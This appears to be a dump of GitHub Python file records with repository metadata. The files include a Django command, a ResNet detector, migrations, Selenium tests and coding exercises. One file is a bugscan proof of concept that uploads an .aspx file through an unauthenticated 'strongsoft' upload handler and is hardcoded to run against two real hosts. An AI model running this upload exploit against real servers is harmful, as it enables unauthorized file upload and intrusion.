blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c74f7972df03e772c45471dfc507ca6f5efa0d51
|
e0c8662a56d89730043146ddc340e9e0b9f7de72
|
/plugin/118a320c-1596.py
|
3205edb6500e7b3aae3542131bb1317f8a8cac3c
|
[] |
no_license
|
izj007/bugscan_poc
|
f2ef5903b30b15c230b292a1ff2dc6cea6836940
|
4490f3c36d4033bdef380577333722deed7bc758
|
refs/heads/master
| 2020-09-22T17:20:50.408078
| 2019-01-18T09:42:47
| 2019-01-18T09:42:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,609
|
py
|
#coding:utf-8
from lib.curl import *
# -*- coding: utf-8 -*-
#__Author__ = treeoph
import re,urlparse
def assign(service, arg):
if service=='strongsoft':
return True,arg
def audit(arg):
p=urlparse.urlparse(arg)
raw='''POST /SysManage/AjaxHandler/UploadHandler.ashx HTTP/1.1
Host: {netloc}
Content-Length: 1305
Origin: {scheme}://{netloc}
X-Requested-With: ShockwaveFlash/20.0.0.267
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Content-Type: multipart/form-data; boundary=----------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Accept: */*
Referer: {scheme}://{netloc}/CommonReport/TableList.aspx?TableDBID=1009&pagetype=page&menuid=136
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="Filename"
test.aspx
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="GetFileName"
y
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="DataType"
UploadFile
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="GetFileInfo"
y
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="UploadFolder"
/CommonReport/
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="fileext"
*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.mpp;*.vsd;*.jpg;*.png;*.gif;*.bmp
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="TCID"
1009
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="folder"
/CommonReport/UploadFile
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="Filedata"; filename="test.aspx"
Content-Type: application/octet-stream
GIF89a
testvul
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="Upload"
Submit Query
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4--'''
code,head,res,errcode, _=curl.curl2(arg+'SysManage/AjaxHandler/UploadHandler.ashx',raw=raw.format(scheme=p.scheme,netloc=p.netloc))
if code == 200 and res:
m=re.search(r'([\w\/\d]+\.aspx)',res)
if m:
file_url='http://%s/%s'%(p.netloc,m.group())
code,head,res,errcode, _=curl.curl2(file_url)
if 'testvul' in res:
security_hole("Upload File at "+file_url)
if __name__=='__main__':
from dummy import *
audit(assign('strongsoft','http://www.hzwr.gov.cn:8080/')[1])
audit(assign('strongsoft','http://60.191.198.109:8060/')[1])
|
[
"yudekui@wsmtec.com"
] |
yudekui@wsmtec.com
|
6ae7560c7fe931a9cb233dbb80213d11ee6f4c7f
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p04001/s207133170.py
|
880c6edc03d8bb2cff7f1a58a4507040bed759aa
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 701
|
py
|
S = input()
# TODO: 再帰関数でリストを作成 [s1, "+", s2, s3, "+", s4]とか
result = []
def dfs(i, list):
if i == len(S):
result.append(list)
return
else:
if i == len(S) - 1:
return dfs(i+1, list+[S[i]])
else:
return dfs(i+1, list+[S[i]]), dfs(i+1, list+[S[i], "+"])
# TODO: リストに従って和を計算
dfs(0, [])
ans = 0
for l in result:
sum_of_l = 0
sequence = 0
for id in range(len(l)):
if l[id] == "+":
sum_of_l += sequence
sequence = 0
else:
sequence *= 10
sequence += int(l[id])
sum_of_l += sequence
ans += sum_of_l
print(ans)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
58c0b95d752a1cb35fe77a104190da67ab2925e7
|
f6ea25823706fe7db053b69639c57431ffc7c8be
|
/Datacademy/venv/bin/pip
|
5c7c8fd81e8f939cc5339c0a391c385f819336c4
|
[] |
no_license
|
BobbyJoeSmith3/Week10Hacks
|
6f57d34a16a01c6a019730539257910b878eef11
|
43aba9b979bc26ec118eb4af4b0d0149ee87461c
|
refs/heads/master
| 2021-01-18T13:42:34.055202
| 2014-06-26T15:36:50
| 2014-06-26T15:36:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 263
|
#!/home/bobbyjoesmith/Training/Week10/Week10Hacks/Datacademy/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"bobbyjoe@codeforprogress.org"
] |
bobbyjoe@codeforprogress.org
|
|
709eb35365d3a06bd9f24087e46777e7a7b37dee
|
2b255d07420114c40f6c8aeb0fb25228588282ed
|
/sitecomber/apps/config/management/commands/crawl_page.py
|
f50bc927ac3a48312f85620262611ccad9a81b10
|
[] |
no_license
|
ninapavlich/sitecomber
|
b48b3ee055dac1f419c98f08fffe5e9dc44bd6e3
|
6f34e5bb96ca4c119f98ee90c88881e8ca3f6f06
|
refs/heads/master
| 2022-12-11T20:55:07.215804
| 2020-03-13T07:58:28
| 2020-03-13T07:58:28
| 197,045,165
| 1
| 0
| null | 2022-12-08T01:47:52
| 2019-07-15T17:42:31
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,015
|
py
|
import logging
from django.core.management.base import BaseCommand
from django.core.exceptions import ObjectDoesNotExist
from sitecomber.apps.results.models import PageResult
logger = logging.getLogger('django')
class Command(BaseCommand):
"""
Example Usage:
Load and parse page result with primary key 1:
python manage.py crawl_page 1
"""
help = 'Crawl Site'
def add_arguments(self, parser):
parser.add_argument('page_result_pk', nargs='+', type=int)
def handle(self, *args, **options):
page_result_pk = int(options['page_result_pk'][0])
logger.info("Going to load page %s" % (page_result_pk))
try:
page = PageResult.objects.get(pk=page_result_pk)
except ObjectDoesNotExist:
logger.error(u"Could not find page result with primary key = %s" % (page_result_pk))
return
page.load()
tests = page.site_domain.site.tests
for test in tests:
test.page_parsed(page)
|
[
"nina@ninalp.com"
] |
nina@ninalp.com
|
626a4d10d7b29271ed92d511a73c67b98affecb1
|
bf8f377422db9954b81cc44259f0450f7799541d
|
/pawn_stars/wsgi.py
|
7db541520d3b5221158eb09ea6282ea4bf8a8fdb
|
[
"MIT"
] |
permissive
|
team-pawn-stars/PawnStars-Backend
|
c7acaaa10fa2f40f77822e5a99af0a9890797471
|
b1ea9d29adea65b3004555386b51e488460d1b30
|
refs/heads/master
| 2020-05-04T13:55:34.080903
| 2019-06-13T12:59:55
| 2019-06-13T12:59:55
| 179,179,127
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 397
|
py
|
"""
WSGI config for pawn_stars project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "pawn_stars.settings")
application = get_wsgi_application()
|
[
"python@istruly.sexy"
] |
python@istruly.sexy
|
e8dd6a42a1f6eb6d94cefb986c43a7cd569be71b
|
48e08c7d5856c35492500b6b01d3d72a31f58ffc
|
/Leetcode/0051-0100/0086-partition-list.py
|
74ffde18be275050ee72f79c301933fb36d60ee1
|
[
"MIT"
] |
permissive
|
MiKueen/Data-Structures-and-Algorithms
|
8d8730e539e1c112cbd4a51beae9e1c3e2184e63
|
8788bde5349f326aac0267531f39ac7a2a708ee6
|
refs/heads/master
| 2021-07-18T17:16:39.948239
| 2020-09-13T15:44:37
| 2020-09-13T15:44:37
| 212,309,543
| 0
| 1
|
MIT
| 2019-10-06T16:24:43
| 2019-10-02T10:19:07
|
Python
|
UTF-8
|
Python
| false
| false
| 1,079
|
py
|
'''
Author : MiKueen
Level : Medium
Problem Statement : Partition List
Given a linked list and a value x, partition it such that all nodes less than x come before nodes greater than or equal to x.
You should preserve the original relative order of the nodes in each of the two partitions.
Example:
Input: head = 1->4->3->2->5->2, x = 3
Output: 1->2->2->4->3->5
'''
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def partition(self, head, x):
"""
:type head: ListNode
:type x: int
:rtype: ListNode
"""
left = left_head = ListNode(0)
right = right_head = ListNode(0)
while head:
if head.val < x:
left.next = head
left = left.next
else:
right.next = head
right = right.next
head = head.next
right.next = None
left.next = right_head.next
return left_head.next
|
[
"keshvi2298@gmail.com"
] |
keshvi2298@gmail.com
|
684022b71ef0d7261d8e43295a62ebc0b0fd84be
|
6fcfb638fa725b6d21083ec54e3609fc1b287d9e
|
/python/BichenWuUCB_squeezeDet/squeezeDet-master/src/nets/resnet50_convDet.py
|
b1d4cde60ed5f428dd7949a8c1ad08f053b0b4cf
|
[] |
no_license
|
LiuFang816/SALSTM_py_data
|
6db258e51858aeff14af38898fef715b46980ac1
|
d494b3041069d377d6a7a9c296a14334f2fa5acc
|
refs/heads/master
| 2022-12-25T06:39:52.222097
| 2019-12-12T08:49:07
| 2019-12-12T08:49:07
| 227,546,525
| 10
| 7
| null | 2022-12-19T02:53:01
| 2019-12-12T07:29:39
|
Python
|
UTF-8
|
Python
| false
| false
| 6,835
|
py
|
# Author: Bichen Wu (bichen@berkeley.edu) 08/25/2016
"""ResNet50+ConvDet model."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import joblib
from utils import util
from easydict import EasyDict as edict
import numpy as np
import tensorflow as tf
from nn_skeleton import ModelSkeleton
class ResNet50ConvDet(ModelSkeleton):
def __init__(self, mc, gpu_id):
with tf.device('/gpu:{}'.format(gpu_id)):
ModelSkeleton.__init__(self, mc)
self._add_forward_graph()
self._add_interpretation_graph()
self._add_loss_graph()
self._add_train_graph()
self._add_viz_graph()
def _add_forward_graph(self):
"""NN architecture."""
mc = self.mc
if mc.LOAD_PRETRAINED_MODEL:
assert tf.gfile.Exists(mc.PRETRAINED_MODEL_PATH), \
'Cannot find pretrained model at the given path:' \
' {}'.format(mc.PRETRAINED_MODEL_PATH)
self.caffemodel_weight = joblib.load(mc.PRETRAINED_MODEL_PATH)
conv1 = self._conv_bn_layer(
self.image_input, 'conv1', 'bn_conv1', 'scale_conv1', filters=64,
size=7, stride=2, freeze=True, conv_with_bias=True)
pool1 = self._pooling_layer(
'pool1', conv1, size=3, stride=2, padding='VALID')
with tf.variable_scope('conv2_x') as scope:
with tf.variable_scope('res2a'):
branch1 = self._conv_bn_layer(
pool1, 'res2a_branch1', 'bn2a_branch1', 'scale2a_branch1',
filters=256, size=1, stride=1, freeze=True, relu=False)
branch2 = self._res_branch(
pool1, layer_name='2a', in_filters=64, out_filters=256,
down_sample=False, freeze=True)
res2a = tf.nn.relu(branch1+branch2, 'relu')
with tf.variable_scope('res2b'):
branch2 = self._res_branch(
res2a, layer_name='2b', in_filters=64, out_filters=256,
down_sample=False, freeze=True)
res2b = tf.nn.relu(res2a+branch2, 'relu')
with tf.variable_scope('res2c'):
branch2 = self._res_branch(
res2b, layer_name='2c', in_filters=64, out_filters=256,
down_sample=False, freeze=True)
res2c = tf.nn.relu(res2b+branch2, 'relu')
with tf.variable_scope('conv3_x') as scope:
with tf.variable_scope('res3a'):
branch1 = self._conv_bn_layer(
res2c, 'res3a_branch1', 'bn3a_branch1', 'scale3a_branch1',
filters=512, size=1, stride=2, freeze=True, relu=False)
branch2 = self._res_branch(
res2c, layer_name='3a', in_filters=128, out_filters=512,
down_sample=True, freeze=True)
res3a = tf.nn.relu(branch1+branch2, 'relu')
with tf.variable_scope('res3b'):
branch2 = self._res_branch(
res3a, layer_name='3b', in_filters=128, out_filters=512,
down_sample=False, freeze=True)
res3b = tf.nn.relu(res3a+branch2, 'relu')
with tf.variable_scope('res3c'):
branch2 = self._res_branch(
res3b, layer_name='3c', in_filters=128, out_filters=512,
down_sample=False, freeze=True)
res3c = tf.nn.relu(res3b+branch2, 'relu')
with tf.variable_scope('res3d'):
branch2 = self._res_branch(
res3c, layer_name='3d', in_filters=128, out_filters=512,
down_sample=False, freeze=True)
res3d = tf.nn.relu(res3c+branch2, 'relu')
with tf.variable_scope('conv4_x') as scope:
with tf.variable_scope('res4a'):
branch1 = self._conv_bn_layer(
res3d, 'res4a_branch1', 'bn4a_branch1', 'scale4a_branch1',
filters=1024, size=1, stride=2, relu=False)
branch2 = self._res_branch(
res3d, layer_name='4a', in_filters=256, out_filters=1024,
down_sample=True)
res4a = tf.nn.relu(branch1+branch2, 'relu')
with tf.variable_scope('res4b'):
branch2 = self._res_branch(
res4a, layer_name='4b', in_filters=256, out_filters=1024,
down_sample=False)
res4b = tf.nn.relu(res4a+branch2, 'relu')
with tf.variable_scope('res4c'):
branch2 = self._res_branch(
res4b, layer_name='4c', in_filters=256, out_filters=1024,
down_sample=False)
res4c = tf.nn.relu(res4b+branch2, 'relu')
with tf.variable_scope('res4d'):
branch2 = self._res_branch(
res4c, layer_name='4d', in_filters=256, out_filters=1024,
down_sample=False)
res4d = tf.nn.relu(res4c+branch2, 'relu')
with tf.variable_scope('res4e'):
branch2 = self._res_branch(
res4d, layer_name='4e', in_filters=256, out_filters=1024,
down_sample=False)
res4e = tf.nn.relu(res4d+branch2, 'relu')
with tf.variable_scope('res4f'):
branch2 = self._res_branch(
res4e, layer_name='4f', in_filters=256, out_filters=1024,
down_sample=False)
res4f = tf.nn.relu(res4e+branch2, 'relu')
dropout4 = tf.nn.dropout(res4f, self.keep_prob, name='drop4')
num_output = mc.ANCHOR_PER_GRID * (mc.CLASSES + 1 + 4)
self.preds = self._conv_layer(
'conv5', dropout4, filters=num_output, size=3, stride=1,
padding='SAME', xavier=False, relu=False, stddev=0.0001)
def _res_branch(
self, inputs, layer_name, in_filters, out_filters, down_sample=False,
freeze=False):
"""Residual branch constructor.
Args:
inputs: input tensor
layer_name: layer name
in_filters: number of filters in XX_branch2a and XX_branch2b layers.
out_filters: number of filters in XX_branch2clayers.
donw_sample: if true, down sample the input feature map
freeze: if true, do not change parameters in this layer
Returns:
A residual branch output operation.
"""
with tf.variable_scope('res'+layer_name+'_branch2'):
stride = 2 if down_sample else 1
output = self._conv_bn_layer(
inputs,
conv_param_name='res'+layer_name+'_branch2a',
bn_param_name='bn'+layer_name+'_branch2a',
scale_param_name='scale'+layer_name+'_branch2a',
filters=in_filters, size=1, stride=stride, freeze=freeze)
output = self._conv_bn_layer(
output,
conv_param_name='res'+layer_name+'_branch2b',
bn_param_name='bn'+layer_name+'_branch2b',
scale_param_name='scale'+layer_name+'_branch2b',
filters=in_filters, size=3, stride=1, freeze=freeze)
output = self._conv_bn_layer(
output,
conv_param_name='res'+layer_name+'_branch2c',
bn_param_name='bn'+layer_name+'_branch2c',
scale_param_name='scale'+layer_name+'_branch2c',
filters=out_filters, size=1, stride=1, freeze=freeze, relu=False)
return output
|
[
"659338505@qq.com"
] |
659338505@qq.com
|
7fa896bdd5e866fa37b79413b77428eca5f260da
|
8a1144dd38388992c7e35a4cc84002e381f2cf1f
|
/python/django_fundamentals/main3/apps/third_app/models.py
|
ef165f7feabe4f6b980f5a16ea9002f10e11ff54
|
[] |
no_license
|
vin792/dojo_assignments
|
18472e868610bacbd0b5141a5322628f4afefb5b
|
449b752f92df224285bfd5d03901a3692a98562e
|
refs/heads/master
| 2021-01-20T00:20:09.896742
| 2017-05-26T17:37:09
| 2017-05-26T17:37:09
| 82,735,702
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 322
|
py
|
from __future__ import unicode_literals
from django.db import models
# Create your models here.
class People(models.Model):
first_name = models.CharField(max_length=30)
last_name = models.CharField(max_length= 30)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
|
[
"vin792@gmail.com"
] |
vin792@gmail.com
|
ba298290ffb40d5dda804815a82833564aff7427
|
73036231277447340ce6ac8cf08fa5aab9772778
|
/libreria/libreria/static/img/django-cities-light-2.0.7/django-cities-light-2.0.7/cities_light/migrations/0012_set_display_name.py
|
e74659676bac3c57ec48aeec83ee56f96928836b
|
[
"MIT"
] |
permissive
|
jesusmaherrera/books_library
|
68f23e2352644df66f92d9e37baf274486984bed
|
c621f86aa2f8000c13371aea2b000a9bd8965fa1
|
refs/heads/master
| 2021-01-13T02:06:24.579310
| 2013-02-06T03:21:16
| 2013-02-06T03:21:16
| 5,944,653
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,926
|
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
for region in orm['cities_light.Region'].objects.all():
region.display_name = u'%s, %s' % (
region.name, region.country.name)
region.save()
for city in orm['cities_light.City'].objects.all():
if city.region_id:
city.display_name = u'%s, %s, %s' % (
city.name, city.region.name, city.country.name)
else:
city.display_name = u'%s, %s' % (
city.name, city.country.name)
city.save()
def backwards(self, orm):
"Write your backwards methods here."
models = {
'cities_light.city': {
'Meta': {'unique_together': "(('region', 'name'),)", 'object_name': 'City'},
'alternate_names': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cities_light.Country']"}),
'display_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'geoname_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '5', 'blank': 'True'}),
'longitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '5', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'name_ascii': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'blank': 'True'}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cities_light.Region']", 'null': 'True'}),
'search_names': ('django.db.models.fields.TextField', [], {'default': "''", 'max_length': '4000', 'db_index': 'True', 'blank': 'True'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '50', 'populate_from': 'None'})
},
'cities_light.country': {
'Meta': {'object_name': 'Country'},
'alternate_names': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'code2': ('django.db.models.fields.CharField', [], {'max_length': '2', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'code3': ('django.db.models.fields.CharField', [], {'max_length': '3', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'continent': ('django.db.models.fields.CharField', [], {'max_length': '2', 'db_index': 'True'}),
'geoname_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'}),
'name_ascii': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'blank': 'True'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '50', 'populate_from': 'None'}),
'tld': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '5', 'blank': 'True'})
},
'cities_light.region': {
'Meta': {'unique_together': "(('country', 'name'),)", 'object_name': 'Region'},
'alternate_names': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cities_light.Country']"}),
'display_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'geoname_code': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '50', 'null': 'True', 'blank': 'True'}),
'geoname_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'name_ascii': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'blank': 'True'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '50', 'populate_from': 'None'})
}
}
complete_apps = ['cities_light']
symmetrical = True
|
[
"jesusmaherrera@gmail.com"
] |
jesusmaherrera@gmail.com
|
7aaaf55396fa42efe3b6ca2c9c2de6dd06a030d0
|
95a6555114011d7ba9b0a842dd348dc4a18a56fc
|
/utils/register_user.py
|
f825ea8fd83e3071a42ff655b47e64950ed36251
|
[
"Unlicense"
] |
permissive
|
battyone/ParaBankSeleniumAutomation
|
c96dfdcb11591dd12db31b7ddd373326ce4284f7
|
e28a886adba89b82a60831ad96a3a8f00f863116
|
refs/heads/master
| 2023-05-04T19:58:13.067568
| 2020-03-15T17:19:09
| 2020-03-15T17:19:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,214
|
py
|
# Created by Egor Kostan.
# GitHub: https://github.com/ikostan
# LinkedIn: https://www.linkedin.com/in/egor-kostan/
import time
import allure
from utils.open_web_browser import open_web_browser
from page_object_models.register_page_model import RegisterPageModel
from expected_results.page_content.register_page_content import RegisterPageContent
from utils.step_definition import step_definition
def register_user(user, config):
'''
Registers a new user.
Does not check for any errors.
Using Selenium webdriver + chrome browser by default
:param page:
:param user:
:return:
'''
page_model = RegisterPageModel
page_context = RegisterPageContent
print("\nUser registration procedure...")
print("\n1. Open web browser...")
page = open_web_browser(config=config,
page_model=page_model,
page_content=page_context)
with allure.step("Fill out Register web form"):
print("\n2. Filling out user data...")
page.type_first_name(user.first_name)
page.type_last_name(user.last_name)
page.type_address(user.address)
page.type_city(user.city)
page.type_state(user.state)
page.type_zip_code(user.zip_code)
page.type_phone(user.phone)
page.type_ssn(user.ssn)
page.type_username(user.username)
page.type_password(user.password)
page.type_confirm(user.password)
with allure.step("Hit 'REGISTER' button"):
print("\n3. Hit 'REGISTER' button...")
page.hit_register_btn()
time.sleep(3)
with allure.step("Verify \"Welcome\" message"):
print('Verify "Welcome" message...')
expected = RegisterPageContent.WELCOME_MESSAGE['message']
actual = page.welcome_message
if expected == actual:
print("OK: Welcome message detected")
else:
print("ERROR: Welcome message does not appear")
with allure.step("Do Log Out"):
print("\n4. Do Log Out...")
page.hit_log_out_button()
time.sleep(3)
with allure.step("Close web browser"):
print("\n5. Close web browser...")
page.quit()
|
[
"igorkostan@gmail.com"
] |
igorkostan@gmail.com
|
28ee36dd6ff812fe4e277bd07efe81507c608c41
|
836d5f7190f6b4503e758c87c71598f18fdfce14
|
/5-Döngüler/While-Döngüsü.py
|
1ac3301b95952b419549dd7879fcf6fe5c4abac3
|
[] |
no_license
|
S-Oktay-Bicici/PYTHON-PROGRAMMING
|
cf452723fd3e7e8ec2aadc7980208d747c502e9a
|
22e864f89544249d6309d6f4570a4104bf47346b
|
refs/heads/main
| 2021-11-30T00:19:21.158084
| 2021-11-16T15:44:29
| 2021-11-16T15:44:29
| 316,716,147
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 425
|
py
|
############################################################
x = 0
while x <= 0:
print("doğru")
x += 1
print("x in değeri: ",x)
############################################################
a = 0
while a < 100:
a += 1
if a % 2 == 0:
print(a)
#############################################################
tr_harfler = "şçöğüİı"
a = 0
while a < len(tr_harfler):
print(tr_harfler[a], sep=" ")
a += 1
|
[
"noreply@github.com"
] |
S-Oktay-Bicici.noreply@github.com
|
561ae3faab88aca8acbdbe2023956a6b79a78cee
|
d40c743378c754b822bc42cfa7ede73792a31ede
|
/sales_by_march.py
|
a56fafb7ead4dc2b25d6515180e7eb7d8368db7d
|
[] |
no_license
|
ShanjinurIslam/HackerRank
|
85127527be319c3f1822c359a5831e4bcce25e8f
|
38d77f2d0f56a6cec4bd544b347ee53d829dc715
|
refs/heads/master
| 2023-02-05T04:28:11.285169
| 2020-12-27T11:21:09
| 2020-12-27T11:21:09
| 320,749,069
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 627
|
py
|
#!/bin/python3
import math
import os
import random
import re
import sys
from collections import defaultdict
# Complete the sockMerchant function below.
def sockMerchant(n, ar):
hash_map = defaultdict(int)
for each in ar:
hash_map[each] += 1
total = 0
for each in hash_map.keys():
total += hash_map[each]//2
return total
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input())
ar = list(map(int, input().rstrip().split()))
result = sockMerchant(n, ar)
fptr.write(str(result) + '\n')
fptr.close()
|
[
"spondoncsebuet@gmail.com"
] |
spondoncsebuet@gmail.com
|
a8b5085e4e8dbff770b58197257f4b8f7f0cdc50
|
5da5473ff3026165a47f98744bac82903cf008e0
|
/packages/google-cloud-apigee-registry/samples/generated_samples/apigeeregistry_v1_generated_registry_get_artifact_sync.py
|
0dbb7b9b471b59e7bc0cd633cdcb3a7389126fc1
|
[
"Apache-2.0"
] |
permissive
|
googleapis/google-cloud-python
|
ed61a5f03a476ab6053870f4da7bc5534e25558b
|
93c4e63408c65129422f65217325f4e7d41f7edf
|
refs/heads/main
| 2023-09-04T09:09:07.852632
| 2023-08-31T22:49:26
| 2023-08-31T22:49:26
| 16,316,451
| 2,792
| 917
|
Apache-2.0
| 2023-09-14T21:45:18
| 2014-01-28T15:51:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,845
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2023 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for GetArtifact
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-apigee-registry
# [START apigeeregistry_v1_generated_Registry_GetArtifact_sync]
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import apigee_registry_v1
def sample_get_artifact():
# Create a client
client = apigee_registry_v1.RegistryClient()
# Initialize request argument(s)
request = apigee_registry_v1.GetArtifactRequest(
name="name_value",
)
# Make the request
response = client.get_artifact(request=request)
# Handle the response
print(response)
# [END apigeeregistry_v1_generated_Registry_GetArtifact_sync]
|
[
"noreply@github.com"
] |
googleapis.noreply@github.com
|
b4d9ec0b78a5f819546da52b89aaac8c78b7f8a7
|
21c1edbdb863158ed812031c6d63a40ba3bea31f
|
/simple/1_player/deep_crossentropy.py
|
bc72f2f610a42d5a302bebe5698aba4cc9692484
|
[] |
no_license
|
Ollitros/Tic-tac-toe
|
22ebe26bc709f3c16210783b7411ee77c4df8aa7
|
b551e1f60d8cbfc7167c057553dff897e34c7093
|
refs/heads/master
| 2020-03-29T22:00:53.037694
| 2019-05-01T17:02:09
| 2019-05-01T17:02:09
| 150,398,894
| 0
| 0
